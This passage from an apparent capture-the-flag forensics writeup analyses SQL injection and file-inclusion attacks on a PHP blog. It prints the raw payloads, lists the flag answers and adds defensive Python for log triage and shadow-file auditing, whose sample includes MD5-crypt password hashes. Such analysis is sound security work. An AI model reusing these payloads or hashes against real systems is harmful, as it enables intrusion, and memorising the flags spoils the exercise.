1    <br /><b>Notice</b>: Use of undefined constant c - assumed c in <b>/tmp/test2.txt</b> on line <b>1</b><br />
admin
calendar
conf
images
inc
index.html
index.html.bak
mail
pages
restricted
robots.txt
sql
    3    4    5
</div>
<div id="center" style="text-align:center;width:100%"><a href="mailto:webmaster@localhost">webmaster</a></div>
</body></html>

The above shows that the page parameter is vulnerable to local file inclusion: the traversal with a trailing %00 pulls in /tmp/test2.txt, PHP evaluates that file (the notice about the undefined constant c is raised from /tmp/test2.txt line 1), and the directory listing that follows is the output of the c=ls parameter.

Another attack targeted parameter id as shown below:

GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,%27test%27,3,4,5+INTO+OUTFILE+%27/tmp/test1.txt%27--+- HTTP/1.1
Host: 192.168.221.143
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 11 Jan 2012 15:07:02 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.2
Content-Length: 1336
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head><title> Prof. EhksBlog</title><style type="text/css">
BODY {
    font-family: helvetica, arial;
    padding: 0px;
    margin: 0px;
}
TABLE.nav {
    background-color: #336699;
}
TABLE.nav a {
    color: white;
    text-decoration: none;
}
H1.title {
    width: 100%;
    background-color: #6699cc;
    padding: 5px;
    margin: 0px;
    border-bottom: 3px solid #113366;
}
DIV#main {
    margin: 5px;
}
</style></head>

Similarly there were other attacks as shown below.
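The two requests above are exactly what a web server's own access log records, so a defender can reconstruct the order of events without the pcap. As an added example (not part of the writeup), the Python below parses Apache combined-format log lines, decodes every query parameter, flags the traversal-plus-%00 pattern seen in page and the UNION ... SELECT ... INTO OUTFILE pattern seen in id, records where an OUTFILE landed, and sorts the hits by time. The sample log is constructed: its two attack request lines and timestamps come from the sessions shown above, while the client address, user agent and the benign first request are invented.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample log in Apache "combined" format.  The two attack request
# lines and their timestamps are taken from the sessions in the writeup; the
# client address, user agent and the benign first request are invented.
SAMPLE_LOG = """\
192.168.221.1 - - [11/Jan/2012:15:06:40 +0000] "GET /index.html?page=blog&title=Blog&id=2 HTTP/1.1" 200 1336 "-" "Mozilla/5.0"
192.168.221.1 - - [11/Jan/2012:15:07:02 +0000] "GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,%27test%27,3,4,5+INTO+OUTFILE+%27/tmp/test1.txt%27--+- HTTP/1.1" 200 1336 "-" "Mozilla/5.0"
192.168.221.1 - - [11/Jan/2012:15:08:00 +0000] "GET /index.html?page=../../../../../../../../../tmp/test2.txt%00&c=ls HTTP/1.1" 200 1373 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Rules run against the *decoded* value of each query parameter, so %27 and
# %00 are already real quotes and NUL bytes by the time they are tested.
RULES = [
    ("sqli_union_outfile", re.compile(r"\bUNION\b.*\bSELECT\b.*\bINTO\s+OUTFILE\b", re.I)),
    ("sqli_union", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("lfi_traversal", re.compile(r"(\.\./){2,}")),
    ("null_byte", re.compile("\x00")),
]
OUTFILE_RE = re.compile(r"INTO\s+OUTFILE\s+'([^']+)'", re.I)


def classify_request(target):
    """Return [(param, [rule names], decoded value)] for one request target."""
    findings = []
    query = urlsplit(target).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            matched = [name for name, rx in RULES if rx.search(value)]
            if matched:
                findings.append((param, matched, value))
    return findings


def triage(log_text):
    """Parse access-log lines, flag injected parameters, return hits in time order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip the line rather than abort the run
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        for param, rules, value in classify_request(m.group("target")):
            mo = OUTFILE_RE.search(value)
            hits.append({
                "ts": ts,
                "time": ts.strftime("%Y-%m-%d %H:%M:%S"),
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "param": param,
                "rules": rules,
                "outfile": mo.group(1) if mo else None,  # path a UNION ... INTO OUTFILE wrote to
            })
    hits.sort(key=lambda h: h["ts"])
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h["time"], h["ip"], h["status"], h["param"], ",".join(h["rules"]), h["outfile"] or "")
```

Run as a script it prints the id hit at 15:07:02 (with /tmp/test1.txt as the written file) before the page hit at 15:08:00, which is the same ordering the writeup arrives at below. Matching on decoded values matters: a rule that looked at the raw URL would have to know about %00 and every other encoding of the same byte.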
From the above we can infer that the attack on parameter id was done before the attack on parameter page: the SQL injection request is timestamped 15:07:02 and the file-inclusion request 15:08:00. The attacker first exploited the SQL injection flaw.

Therefore the flags are:

Flag I   id
Flag II  page
Flag III Tavis Ormandy and Julien Tinnes
Flag IV  zuzana
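The /etc/shadow listing and the john run above also give a defender two things to check without cracking anything: which accounts still use the legacy MD5-crypt ($1$) scheme that john gets through with a wordlist, and whose password-change day stands out from the rest of the host (root's third field reads 15350 while nearly every other account reads 14309). The Python below is an added example, not part of the writeup; its sample entries are a subset copied from the listing above, and the 30-day drift tolerance is an assumption.

```python
from collections import Counter
from datetime import date, timedelta

EPOCH = date(1970, 1, 1)  # shadow(5) counts days since this date

# A subset of the /etc/shadow listing shown in the writeup.
SAMPLE_SHADOW = """\
root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
bin:*:14309:0:99999:7:::
apache:!!:14309:0:99999:7:::
dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
ossec:!!:14312:0:99999:7:::
"""

# crypt(3) prefixes.  $1$ is MD5-crypt: a fixed 1000 rounds of MD5, cheap on
# modern hardware, and exactly what john cracked in the writeup.
SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}

# Assumption: a change more than this many days from the host's baseline day
# is worth a second look.  Tune it to the environment.
DRIFT_DAYS = 30


def parse_shadow(text):
    """Parse shadow(5) lines into {user: {hash, scheme, changed, changed_day}}."""
    entries = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 9:
            continue  # shadow(5) lines have exactly nine fields; skip anything else
        user, hashval, lastchg = fields[0], fields[1], fields[2]
        if hashval in ("", "!", "!!", "*"):
            scheme = "empty" if hashval == "" else "locked"
        else:
            scheme = next((n for p, n in SCHEMES.items() if hashval.startswith(p)), "unknown")
        day = int(lastchg) if lastchg.isdigit() else None
        entries[user] = {
            "hash": hashval,
            "scheme": scheme,
            "changed_day": day,
            "changed": (EPOCH + timedelta(days=day)).isoformat() if day is not None else None,
        }
    return entries


def audit(entries):
    """Return {user: [reasons]} for accounts an incident responder should look at."""
    days = Counter(e["changed_day"] for e in entries.values() if e["changed_day"] is not None)
    baseline = days.most_common(1)[0][0]  # the day most accounts were last set
    report = {}
    for user, e in entries.items():
        reasons = []
        if e["scheme"] == "md5crypt":
            reasons.append("md5crypt hash: cheap to brute-force, rehash with sha512crypt or yescrypt")
        elif e["scheme"] == "empty":
            reasons.append("empty password field: login without a password")
        if e["changed_day"] is not None and abs(e["changed_day"] - baseline) > DRIFT_DAYS:
            reasons.append("password changed %s, baseline for this host is %s"
                           % (e["changed"], (EPOCH + timedelta(days=baseline)).isoformat()))
        if reasons:
            report[user] = reasons
    return report


if __name__ == "__main__":
    for user, reasons in audit(parse_shadow(SAMPLE_SHADOW)).items():
        print(user, "->", "; ".join(reasons))
```

On the sample, root is reported twice: it carries an MD5-crypt hash, and its password was last set on 2012-01-11 while the host's baseline is 2009-03-06, which lines up with the dates in the captured sessions. The locked (* and !!) system accounts and the users whose change day sits within the tolerance are left alone, so the report stays short enough to act on.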